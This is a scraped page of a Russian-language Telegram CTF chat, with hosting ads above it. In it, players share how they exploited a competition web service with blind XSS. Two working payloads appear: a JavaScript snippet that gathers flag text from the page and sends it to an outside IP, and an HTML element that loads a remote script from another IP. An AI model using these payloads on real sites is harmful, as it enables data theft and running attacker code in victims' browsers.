В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

#ctfchat

876 membersпожаловаться на группу
2021 May 09

AK

Artyom Kadushko in #ctfchat
Мы видели весь трафик, но ничего не работает
источник
01:02пожаловаться#1

R

Rubikoid in #ctfchat
(() => {
console.log('kks with <3')
const flags = Array.from(document.querySelectorAll('p')).map(e => e.innerText).filter(e => e.includes('SAAR')).join(',')
const tag = document.createElement('script')
console.log(tag)
tag.src = `http://10.32.120.2:22222/?data=${flags}`
document.body.appendChild(tag)
})()
источник
01:02пожаловаться#2

R

Rubikoid in #ctfchat
и там хуету в комменты
источник
01:03пожаловаться#3

ㅤK

ㅤ Kekov 🦋 in #ctfchat
HLE as a service
источник
01:04пожаловаться#4

ㅤK

ㅤ Kekov 🦋 in #ctfchat
sticker.webp
(98.28 Кб)
источник
01:04пожаловаться#5

AK

Artyom Kadushko in #ctfchat
А почему это работает?
источник
01:06пожаловаться#6

R

Rubikoid in #ctfchat
@greg0r0
источник
01:07пожаловаться#7

AK

Artyom Kadushko in #ctfchat
Мы пробовали похожую штуку, но они не сработали
источник
01:07пожаловаться#8

g

greg0r0 in #ctfchat
особенности парса JS
источник
01:07пожаловаться#9

g

greg0r0 in #ctfchat
но это на самом деле
источник
01:07пожаловаться#10

g

greg0r0 in #ctfchat
mp4.mp4
(160.91 Кб)
источник
01:07пожаловаться#11

AK

Artyom Kadushko in #ctfchat
Типа, а как вы автоматизировали всю эту штуку?
источник
01:07пожаловаться#12

g

greg0r0 in #ctfchat
ну типо, блайнд xss
источник
01:07пожаловаться#13

A

Anime Boy in #ctfchat
цтф для одноклеточных
источник
01:07пожаловаться#14

g

greg0r0 in #ctfchat
да алерты не работали, но код де факто выполнялся
источник
01:07пожаловаться#15

g

greg0r0 in #ctfchat
почему и как я хз - не мастер CSP тегов
источник
01:08пожаловаться#16

AK

Artyom Kadushko in #ctfchat
Фулл сплоит плиз
источник
01:08пожаловаться#17

g

greg0r0 in #ctfchat
@Rubikoid
источник
01:08пожаловаться#18

g

greg0r0 in #ctfchat
ну там был сервачок на flask и сплоит кремлебот, который комменты рассылал
источник
01:08пожаловаться#19

g

greg0r0 in #ctfchat
пейлоад скрипта такой
<div id="videoView" data-elem="script" data-src="http://68.183.74.213:22222/static/govno.js"></div>
источник
01:09пожаловаться#20